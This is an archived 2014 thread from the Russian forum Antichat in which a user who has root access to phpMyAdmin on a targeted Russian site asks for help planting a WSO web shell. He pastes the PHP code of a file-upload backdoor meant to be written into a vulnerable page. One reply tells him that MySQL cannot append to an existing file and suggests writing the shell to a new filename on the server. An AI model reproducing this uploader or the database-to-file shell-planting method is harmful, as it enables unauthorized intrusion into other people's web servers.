Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Upoad shell wso через phphmyadmin (https://forum.antichat.xyz/showthread.php?t=407516)

SGskam 01.03.2014 22:22
http://yadi.sk/d/Ez4guzZ9JkuAy

вот ссылка на видео так сказать с наглядной проблемой

Значит непосредственно перейдём к проблеме

У меня есть доступ к phpmyadmin root пользователю

Я значит создаю новую базу, таблицу и вписываю туда такой код









ZaraByte File Uploader







setUploadLocation(getcwd().DIRECTORY_SEPARATOR);

$myUpload->uploadFile();

?>

uploadLocation = getcwd().DIRECTORY_SEPARATOR;

}

/**

* This function sets the directory where to upload the file

* In case of Windows server use the form: c:\\temp\\

* In case of Unix server use the form: /tmp/

*

* @param String Directory where to store the files

*/

function setUploadLocation($dir){

$this->uploadLocation = $dir;

}

function showUploadForm($msg='',$error=''){

?>





ZaraByte's File Uploader



'.$msg.'';

} else if ($error != ''){

echo ''.$error.'';

}

?>





File:

















ZaraByte File Uploader



showUploadForm();

} else {

$msg = '';

$error = '';

//Check destination directory

if (!file_exists($this->uploadLocation)){

$error = "The target directory doesn't exists!";

} else if (!is_writeable($this->uploadLocation)) {

$error = "The target directory is not writeable!";

} else {

$target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);

if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {

$msg = basename( $_FILES['myfile']['name']).

" was uploaded successfully!";

} else{

$error = "The upload process failed!";

}

}

$this->showUploadForm($msg,$error);

}

}

}

?>



на видео видно

и у меня не выполняется sql запрос с помошью которого из созданой мною таблицей с кодо, чтобы это всё дело добавилось к дырявой странице и я мог залить шелл

помогите решить проблему пожалста

Gorev 01.03.2014 23:19
https://rdot.org/forum/showthread.php?t=347

Gorev 01.03.2014 23:22
Цитата:
Сообщение от qaz
qaz said:
можно вопрос, а нахрена пихать в запись колонки этот код?
Видео не смотрел, но судя по тому как он пытается через пыху шелл ливануть, его и не стоит смотреть

SGskam 02.03.2014 17:34
#1086 - File '/var/www/siltd/units/base.php' already exists пишет при заливке мини-шелла

SGskam 02.03.2014 17:43
прикол этого кода в том что если удастся его добавить к коду дырявой страницы

то есть http://www.хххххх.ru/units/base.php то там появится upload

для лучшего понятия ситуации советую посмотреть видео

totenkopf 13.03.2014 21:36
Вы пытаетесь добавить код к существующему файлу?

Mysql такого не умеет.

Создавайте новый файл.

В тексте ошибки же написано "файл уже существует".

Попробуйте сохранить скажем в "/var/www/siltd/units/base2.php"

Если хватит прав все будет отлично.


Время: 05:02